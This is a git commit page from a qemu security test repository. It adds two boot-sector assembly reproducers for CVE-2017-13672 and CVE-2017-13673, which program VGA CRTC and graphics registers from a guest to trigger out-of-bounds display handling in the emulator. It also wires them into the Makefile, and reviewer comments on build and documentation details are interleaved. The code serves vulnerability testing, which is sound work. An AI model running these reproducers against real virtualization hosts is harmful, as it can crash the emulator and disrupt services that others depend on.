authorGerd Hoffmann <kraxel@redhat.com>2017-08-30 15:54:02 +0200
committerGerd Hoffmann <kraxel@redhat.com>2017-08-30 15:54:24 +0200
commit2339ec544399cd66930643817ba1cb1094ddccfa (patch)
tree1a4f3edf18b81f1b628bdea7e1ddd9910f6bd9ef
parent1808bb759313e69205f828d49fe9ffbcb1859377 (diff)
downloadqemu-security-2339ec544399cd66930643817ba1cb1094ddccfa.tar.gz
add cve-2017-13672 + cve-2017-13673 reproducers
-rw-r--r--.gitignore1
-rw-r--r--Makefile6
-rw-r--r--boot-cve-2017-13672.asm25
-rw-r--r--boot-cve-2017-13673.asm51
4 files changed, 82 insertions, 1 deletions
diff --git a/.gitignore b/.gitignore
index 20225f6..8ddcd7c 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
cve-[0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9]
+boot-*.raw
*.o
*~
diff --git a/Makefile b/Makefile
index ac72595..1232fee 100644
--- a/Makefile
+++ b/Makefile
@@ -6,7 +6,8 @@ CFLAGS += -Wall
CVETEST := cve-2016-3712
PCITEST := cve-2017-2615 cve-2017-2620
USBTEST := cve-2017-5898
-TARGETS := $(CVETEST) $(PCITEST) $(USBTEST)
+RAWTEST := boot-cve-2017-13672.raw boot-cve-2017-13673.raw
+TARGETS := $(CVETEST) $(PCITEST) $(USBTEST) $(RAWTEST)
DEPENDS := libpci libusb-1.0
$(PCITEST) : CFLAGS += $(shell pkg-config --cflags libpci)
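Review bot: Adding `RAWTEST` to `TARGETS` makes the default build depend on `nasm`, but nothing declares or checks for it the way `DEPENDS` does for the pkg-config libraries, so on a host without nasm `make` now fails for the C reproducers as well. Consider a `NASM ?= nasm` variable next to `DEPENDS` so the assembler is visible as a requirement and can be overridden from the command line, and a short comment on the new variable such as `# RAWTEST: 512-byte boot-sector images; run them as a guest disk, not on the host`, since unlike the other tests these are not host programs.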
@@ -40,6 +41,9 @@ clean:
rm -f $(TARGETS)
rm -f *~ *.o
+boot-%.raw: boot-%.asm
+ nasm -o $@ $<
+
cve-2017-2615: cve-2017-2615.o pci.o cirrus.o
cve-2017-2620: cve-2017-2620.o pci.o cirrus.o
cve-2017-5898: cve-2017-5898.o usb.o
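Review bot: The recipe `nasm -o $@ $<` relies on nasm's default output format being a flat binary; write `nasm -f bin -o $@ $<` so the intent is explicit and a later change of assembler or flags cannot silently produce an object file named `.raw` that qemu would then try to boot. The `TIMES 510-($-$$) DB 0` padding in the sources already makes nasm reject code that outgrows a sector, so no extra size check is needed, but a `.DELETE_ON_ERROR:` special target would still ensure a failed assembly never leaves a stale-but-newer `.raw` that the next `make` treats as up to date. The `clean` rule continues outside the hunk; since the `.raw` files are part of `TARGETS` they are presumably already removed by `rm -f $(TARGETS)`.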
diff --git a/boot-cve-2017-13672.asm b/boot-cve-2017-13672.asm
new file mode 100644
index 0000000..2d9ca9d
--- /dev/null
+++ b/boot-cve-2017-13672.asm
@@ -0,0 +1,25 @@
+; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+ BITS 16
+
+ ORG 0x7C00
+
+ mov ax, 0x4F02
+ mov bx, 0x4118 ; 1024x768x24, LFB enabled
+ int 0x10 ; init VESA graphics via BIOS
+
+ mov dx, 0x3d4
+ mov al, 0x1d
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ or al, 0x80
+ out dx, al
+
+ jmp $
+
+ TIMES 510-($-$$) DB 0
+ DW 0xAA55 ; boot signature
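Review bot: The header says only "pass as disk to qemu", but not which emulated VGA adapter this targets or what a successful reproduction looks like; CRTC index 0x1d lies outside the standard VGA CRTC register map, so the read-modify-write of bit 7 presumably hits a vendor-specific extended register of one particular model, and that should be stated, e.g. `; requires the VGA model affected by CVE-2017-13672 (see the qemu advisory); CRTC 0x1d bit 7 is presumably an extended start-address bit that moves the scanout window past the end of vram`. The VBE call at `int 0x10` is not checked: if AX is not 0x004F the mode switch failed and the CRTC poke runs in text mode, so a comment like `; no AX==0x004F check: on failure the poke still runs, but in text mode` would save a reader from misreading a non-crash as "fixed". The `jmp $` spin keeps the guest vCPU at 100%; a `hang: hlt` / `jmp hang` pair idles the guest while the host-side display refresh still runs the vulnerable path.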
diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm
new file mode 100644
index 0000000..21d5f3d
--- /dev/null
+++ b/boot-cve-2017-13673.asm
@@ -0,0 +1,51 @@
+; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+ BITS 16
+
+ ORG 0x7C00
+
+ mov dx, 0x3d4 ; start_addr high byte
+ mov al, 0x0c
+ out dx, al
+
+ mov dx, 0x3d5
+ mov al, 0xff
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x07
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x10
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x09
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x40
+ out dx, al
+
+
+ mov dx, 0x3ce ; gfx mode
+ mov al, 0x06
+ out dx, al
+
+ mov dx, 0x3cf
+ mov al, 0x01
+ out dx, al
+
+
+ jmp $
+
+ TIMES 510-($-$$) DB 0
+ DW 0xAA55 ; boot signature
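Review bot: The two `; line_compare` comments do not say which bit each write clears, which matters here because the low byte (CRTC 0x18) is left untouched and only the high bits are cleared; in the standard VGA CRTC map index 0x07 is the overflow register whose bit 4 is line-compare bit 8 and index 0x09 is the maximum-scan-line register whose bit 6 is line-compare bit 9, so `; CR07 bit 4 = line compare bit 8` and `; CR09 bit 6 = line compare bit 9` would make the sequence self-explanatory. Likewise `; start_addr high byte` could note that the low byte (CRTC 0x0d) is deliberately left at its BIOS value, and `; gfx mode` that GR06 bit 0 switches the adapter out of text mode after the registers were set up, which is presumably what makes the split-screen path run with the odd start address. As with the other reproducer, the file header should state the expected observable result (a qemu abort versus a garbled display) so a tester knows when the bug is present, and `jmp $` could become a `hlt` loop to avoid spinning the vCPU.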